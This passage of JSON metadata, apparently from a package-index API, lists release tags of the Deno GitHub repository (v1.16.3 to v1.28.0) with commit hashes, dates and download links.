v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/den